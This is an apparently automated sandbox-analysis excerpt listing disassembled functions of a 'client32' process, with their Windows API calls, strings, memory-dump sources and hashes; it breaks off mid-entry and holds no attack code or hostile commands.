                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                • API String ID: 624642848-3840833929
                                                                                • Opcode ID: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                                • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
                                                                                • Opcode Fuzzy Hash: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                                • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                                Function 11047874 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 129registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Closewsprintf
                                                                                • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                • API String ID: 4060989581-4096285074
                                                                                • Opcode ID: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
                                                                                • Instruction ID: f393627671fb017ea66c5cc56c7c64c93c0c73457dc74dc6be4a09c67f558207
                                                                                • Opcode Fuzzy Hash: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
                                                                                • Instruction Fuzzy Hash: F14106B5E006699BD725CB64CC80FEEB3B8EF45308F1045E8EA5997680EB31AE44CF55
                                                                                Function 110478A9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Closewsprintf
                                                                                • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                • API String ID: 4060989581-4096285074
                                                                                • Opcode ID: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
                                                                                • Instruction ID: 0c1333cb51f3e687940ac8a863b18b978c2e00f876245ba0d4622cc4c938ac8c
                                                                                • Opcode Fuzzy Hash: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
                                                                                • Instruction Fuzzy Hash: 1B4106B5E006699BD715CB64CC80FEEB3B8EF45308F1045E8EA5997280EB31AE44CF55
                                                                                Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                  • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 3136964118-2830328467
                                                                                • Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                • Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                Function 110ED7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
                                                                                • _free.LIBCMT ref: 110ED81C
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • _malloc.LIBCMT ref: 110ED82E
                                                                                • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                                • _free.LIBCMT ref: 110ED8E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                • String ID: Error %d getting %s
                                                                                • API String ID: 582965682-2709163689
                                                                                • Opcode ID: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
                                                                                • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                                • Opcode Fuzzy Hash: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
                                                                                • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                                Function 1100F990 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9
                                                                                  • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
                                                                                  • Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
                                                                                  • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
                                                                                • _memmove.LIBCMT ref: 1100FA4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 443534600-4289949731
                                                                                • Opcode ID: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                                • Instruction ID: dd7b0a9210ae89047594a984bf0db1b74830ff0f253f3c884b4c9459fb9d7564
                                                                                • Opcode Fuzzy Hash: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                                • Instruction Fuzzy Hash: 1031FE72B04205CFE715CE5DE880A5AF7D9EF957A4B10062FE551CB240D771EC80D792
                                                                                Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BF7B), ref: 11110928
                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                • IsWindow.USER32(?), ref: 1103D17E
                                                                                • SendMessageA.USER32(?,0000004A,00040310,00000492), ref: 1103D1B8
                                                                                • _free.LIBCMT ref: 1103D1BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                • String ID: Show16
                                                                                • API String ID: 625148989-2844191965
                                                                                • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                                • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • IsA(), xrefs: 1100968D, 110096B5
                                                                                • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                                • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 863766397-389219706
                                                                                • Opcode ID: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                • Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
                                                                                • Opcode Fuzzy Hash: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                • Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1
                                                                                Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                • API String ID: 2735369351-763374134
                                                                                • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                Function 110056A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                                • BeginPaint.USER32(?,?), ref: 110056E8
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                                • EndPaint.USER32(?,?), ref: 1100572F
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110056C8
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                                Memory Dump Source
